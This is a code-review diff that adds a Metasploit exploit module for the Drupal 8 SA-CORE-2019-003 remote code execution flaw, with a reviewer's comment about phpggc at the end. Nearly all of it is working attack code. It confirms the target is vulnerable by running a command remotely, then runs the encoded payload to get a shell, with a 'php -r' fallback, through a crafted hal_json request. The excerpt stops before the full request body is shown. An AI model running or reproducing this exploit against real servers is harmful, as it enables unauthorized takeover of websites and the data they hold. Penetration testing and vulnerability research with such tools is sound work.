modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb

```diff
@@ -0,0 +1,178 @@
+      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
+    ])
+  end
+
+  def check
+    checkcode = CheckCode::Safe
+
+    @version = target['Version'] || drupal_version
+
+    if @version && @version.to_s =~ /^8\b/
+      print_status("Drupal #{@version} targeted at #{full_uri}")
+      checkcode = CheckCode::Detected
+    else
+      print_error('Could not determine Drupal version to target')
+      return CheckCode::Unknown
+    end
+
+    token = random_crap
+    res   = execute_command("printf #{token}")
+
+    if res && res.body.end_with?(token)
+      checkcode = CheckCode::Vulnerable
+    end
+
+    checkcode
+  end
+
+  def exploit
+    if check == CheckCode::Safe && datastore['ForceExploit'] == false
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    unless @version
+      print_warning('Targeting Drupal 8.x')
+      @version = Gem::Version.new('8')
+    end
+
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
+      # XXX: Naughty datastore modification
+      datastore['DUMP_OUTPUT'] = true
+    end
+
+    # Try to get shell
+    execute_command(payload.encoded)
+     
+     sleep(wfs_delay)
+     return if session_created?
+
+    # XXX: This will spawn a *very* obvious process
+    execute_command("php -r '#{payload.encoded}'")
+  end
+
+  def execute_command(cmd)
+    print_status("Executing #{cmd}")
+    res = exploit_drupal8(cmd)
+
+    if res && res.code == 422
+		print_error "Exploit failed, in case that VHOST was not defined, consider to set that option"  	
+    end
+
+    if res && res.code != 403
+      print_error("Unexpected reply: #{res.inspect}")
+      return
+    end
+
+    if res && datastore['DUMP_OUTPUT']
+      print_line(res.body)
+    end
+
+    res
+  end
+
+  # Custom implementation of full_uri to take the vhost if exists, since the exploit may not work when using IP
+  # @see full_uri
+  def vhost_full_uri
+  	host = "#{datastore['VHOST']}" || "#{rhost}"
+  	if !datastore['VHOST']
+  		print_warning "The exploit may not work when using IP instead of host name, consider to set VHOST option"
+  	end
+
+    uri_scheme = ssl ? 'https' : 'http'
+    uri_port = rport.to_s == '80' ? '' : ":#{rport}"
+    uri = normalize_uri(target_uri.to_s)
+    "#{uri_scheme}://#{host}#{uri_port}#{uri}"
+  end
+
+  def exploit_drupal8(cmd)
+    # Clean URLs are enabled by default and "can't" be disabled
+    uri = normalize_uri(target_uri.path, 'node')
+
+    # @todo Support other formats ?
+    vars_get = {
+      '_format' => 'hal_json'
+    }
+
+    # Get the command length for the payload
+    cmd_len = cmd.length.to_s
+
+    data = {
+	  "link" => [
+	    {
+	      "value" => "link",
```

Comment:
Was this generated with [phpggc](https://github.com/ambionics/phpggc) per chance? If so, include the command that was used to generate it, either in a comment here, or the module documentation.